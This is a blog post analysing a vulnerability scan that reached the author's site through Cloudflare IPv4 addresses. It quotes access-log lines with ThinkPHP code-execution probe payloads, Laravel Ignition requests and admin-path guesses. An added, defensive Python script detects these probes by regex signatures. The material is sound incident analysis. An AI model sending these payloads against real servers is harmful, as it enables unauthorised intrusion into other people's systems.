An unrequested web vulnerability scan from cloudflare IPv4 space / 2023-02-24

I noticed a strange peak in web traffic today and when digging into it found out it was a web vulnerability scan. What made me look further was the fact that the source IPv4 addresses were randomized over quite a range, so any automatic firewalling wouldn't block the attempts.

This turned out to originate from cloudflare IPv4 space. Interesting how the source IP addresses clearly spread out (which would circumvent a lot of automatic web application firewalls).
172.70.251.143 - - [24/Feb/2023:09:52:22 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:24 +0100] "GET /index.php?s=%2Fuser%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:26 +0100] "GET /index.php?s=index%2Fuser%2F_empty HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.56 - - [24/Feb/2023:09:52:27 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.250.40 - - [24/Feb/2023:09:52:27 +0100] "GET /admin/public/login.html HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.250.41 - - [24/Feb/2023:09:52:28 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.56 - - [24/Feb/2023:09:52:28 +0100] "POST /_ignition/execute-solution HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:29 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:29 +0100] "GET /seller/login/reg HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:29 +0100] "GET /index.php?s=%2Fuser%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.247.24 - - [24/Feb/2023:09:52:31 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:31 +0100] "GET /index.php?s=%2Fapi%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:35 +0100] "GET /ch/upload/upload HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:35 +0100] "GET /index.php?s=index%2Fuser%2F_empty HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.132 - - [24/Feb/2023:09:52:36 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:36 +0100] "GET /admin/public/login.html HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:37 +0100] "GET /loginMe HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:39 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.242.219 - - [24/Feb/2023:09:52:40 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.132 - - [24/Feb/2023:09:52:40 +0100] "GET /admin/other_cert/cert.php HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.17 - - [24/Feb/2023:09:52:41 +0100] "GET /index.php?case=admin&act=login&admin_dir=admin&site=default HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
I checked with someone who uses cloudflare for sites and these IPv4 addresses match how cloudflare proxies sites. My current theory is that someone set up a cloudflare proxy with my site as 'backend' and scanned the 'frontend' to make it harder for me to find the origin.
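As an added example (not part of the original post and not a tool from idefix.net), the script below runs the two checks a practitioner would want over the log lines quoted above: whether every source address falls inside Cloudflare's published IPv4 prefixes, and which requests match the probe patterns visible in the log (the ThinkPHP `think\app/invokefunction` and `invokeMethod` requests, which ask the target to evaluate `md5()` of a constant and look for the digest in the reply as a canary for code execution; the Laravel `/_ignition/execute-solution` endpoint; and the bare admin/login path guesses). The prefix list is the one the author of this example knows from https://www.cloudflare.com/ips-v4 and should be refetched before being relied on. The signature labels and the one benign line from 192.0.2.10 are this example's own constructions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Cloudflare's published IPv4 ranges as known to the author of this example
# (https://www.cloudflare.com/ips-v4). Refetch that list before relying on it;
# prefixes are added and retired over time.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Apache/nginx "combined" log format, as used in the post's log excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request patterns lifted from the log above; the labels are this example's own
# shorthand, not names the scanner announces. Matching is done on the URL-decoded
# target so %5C (backslash) and %2F (slash) line up with what the application sees.
RCE_SIGNATURES = {
    "thinkphp-invoke": re.compile(r"think\\app/invoke(function|method)", re.I),
    "laravel-ignition": re.compile(r"^/_ignition/execute-solution"),
}
PROBE_PATHS = {
    "/admin/auth/login", "/admin/public/login.html", "/loginMe",
    "/seller/login/reg", "/admin/other_cert/cert.php", "/ch/upload/upload",
}

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ip"] = ipaddress.ip_address(rec["ip"])
    rec["decoded"] = unquote(rec["target"])
    return rec

def is_cloudflare(ip):
    """True if the address lies in one of Cloudflare's published prefixes."""
    return any(ip in net for net in CLOUDFLARE_V4)

def classify(decoded_target):
    """Return the signature labels a decoded request target matches."""
    labels = [name for name, rx in RCE_SIGNATURES.items() if rx.search(decoded_target)]
    path = decoded_target.split("?", 1)[0]
    if path in PROBE_PATHS:
        labels.append("path-probe")
    return labels

def analyse(lines):
    """Summarise source addresses and probe signatures over a list of log lines."""
    recs = [r for r in map(parse_line, lines) if r]
    ips = {r["ip"] for r in recs}
    hits = {}
    for r in recs:
        for label in classify(r["decoded"]):
            hits[label] = hits.get(label, 0) + 1
    return {
        "requests": len(recs),
        "distinct_ips": len(ips),
        "cloudflare_ips": sum(1 for ip in ips if is_cloudflare(ip)),
        "non_cloudflare": sorted(str(ip) for ip in ips if not is_cloudflare(ip)),
        "hits": hits,
    }

# Five lines copied from the post, plus one constructed benign request from
# 192.0.2.10 (documentation address space) so the Cloudflare check has a negative case.
SAMPLE_LOG = r'''
172.70.251.143 - - [24/Feb/2023:09:52:22 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:24 +0100] "GET /index.php?s=%2Fuser%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.56 - - [24/Feb/2023:09:52:28 +0100] "POST /_ignition/execute-solution HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.132 - - [24/Feb/2023:09:52:36 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:37 +0100] "GET /loginMe HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
192.0.2.10 - - [24/Feb/2023:09:53:00 +0100] "GET / HTTP/1.1" 200 1234 "-" "curl/7.88.1"
'''.strip().splitlines()

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Run against the six sample lines it reports five distinct addresses inside 172.64.0.0/13 and one outside, two ThinkPHP invocation probes, one Ignition probe and two path probes. The combined format only records the proxy's address; if these requests really came through Cloudflare they also carried a `CF-Connecting-IP` header with the actual client address and a `CF-RAY` request id, and the `Host` header named the zone the attacker registered. Adding those three fields to the log format would let the same script attribute the scan to a client and a zone instead of stopping at the Cloudflare prefix.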

At this moment the cloudflare abuse form doesn't work for me. I don't have a lot of trust in cloudflare doing things to stop abuse from cloudflare customers so I'm not going to jump through more hoops to get them to notice this, I expect a big disappointment when I get an actual answer from them.

Reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4.